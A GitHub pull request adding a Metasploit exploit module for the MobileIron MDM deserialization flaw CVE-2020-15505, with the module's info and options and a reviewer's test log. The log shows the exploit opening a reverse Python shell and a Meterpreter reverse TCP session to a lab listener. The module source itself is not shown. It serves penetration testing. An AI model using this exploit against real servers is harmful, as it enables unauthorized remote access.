
Add MobileIron CVE-2020-15505 exploit #14645

Merged
merged 3 commits into from Jan 22, 2021

Conversation

wvu
Contributor

@wvu wvu commented Jan 22, 2021

msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > info

       Name: MobileIron MDM Hessian-Based Java Deserialization RCE
     Module: exploit/linux/http/mobileiron_mdm_hessian_rce
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-09-12

Provided by:
  Orange Tsai
  rootxharsh
  iamnoooob
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an ACL bypass in MobileIron MDM products to
  execute a Groovy gadget against a Hessian-based Java deserialization
  endpoint.

References:
  https://cvedetails.com/cve/CVE-2020-15505/
  https://www.mobileiron.com/en/blog/mobileiron-security-updates-available
  https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
  https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505

msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) >

@wvu wvu added module blocked Blocked by one or more additional tasks feature needs-docs labels Jan 22, 2021
@label-actions

label-actions bot commented Jan 22, 2021

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@wvu wvu changed the title [WIP] Add MobileIron CVE-2020-15505 exploit Add MobileIron CVE-2020-15505 exploit Jan 22, 2021
@wvu wvu removed the blocked Blocked by one or more additional tasks label Jan 22, 2021
@wvu wvu marked this pull request as ready for review January 22, 2021 07:12
@wvu wvu added docs and removed needs-docs labels Jan 22, 2021
@smcintyre-r7 smcintyre-r7 self-assigned this Jan 22, 2021
Contributor

@smcintyre-r7 smcintyre-r7 left a comment


Everything looks good. My only concern is that there appear to be a few strings that would likely benefit from some randomization like the Referer header, MSF on L130 and HACK THE PLANET on L144.

Other than that looks good, I'll test this once I get an environment up.

@smcintyre-r7
Contributor

Finished testing and it worked as intended after I got the environment up.

msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > show options 

Module options (exploit/linux/http/mobileiron_mdm_hessian_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.50   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > check
[+] 192.168.159.50:443 - The target is vulnerable. ACL bypass successful.
msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > exploit

[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. ACL bypass successful.
[*] Executing Unix Command for cmd/unix/reverse_python_ssl
[*] Command shell session 2 opened (192.168.159.128:4444 -> 192.168.159.50:41826) at 2021-01-22 16:28:18 -0500

id
uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
exit	
[*] 192.168.159.50 - Command shell session 2 closed.
msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > set TARGET 1
TARGET => 1
msf6 exploit(linux/http/mobileiron_mdm_hessian_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. ACL bypass successful.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3008420 bytes) to 192.168.159.50
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.50:41836) at 2021-01-22 16:28:30 -0500

meterpreter > getuid
Server username: tomcat @ mobileiron.home.lan (uid=101, gid=102, euid=101, egid=102)
meterpreter > sysinfo
Computer     : mobileiron.home.lan
OS           : CentOS 7.6.1810 (Linux 3.10.0-1062.4.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

Spencer tells me not to signature-bait, at least not so obviously. ;)
@smcintyre-r7 smcintyre-r7 merged commit 17b9998 into rapid7:master Jan 22, 2021
@smcintyre-r7
Contributor

smcintyre-r7 commented Jan 22, 2021

Release Notes

New exploit module exploits/linux/http/mobileiron_mdm_hessian_rce targets CVE-2020-15505, an unauthenticated RCE in MobileIron. The vulnerability is due to the deserialization of user data in an API endpoint that can be accessed through an ACL bypass.

@wvu wvu deleted the feature/mobileiron branch January 22, 2021 23:25
@kishore040

It's amazing

@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 3, 2021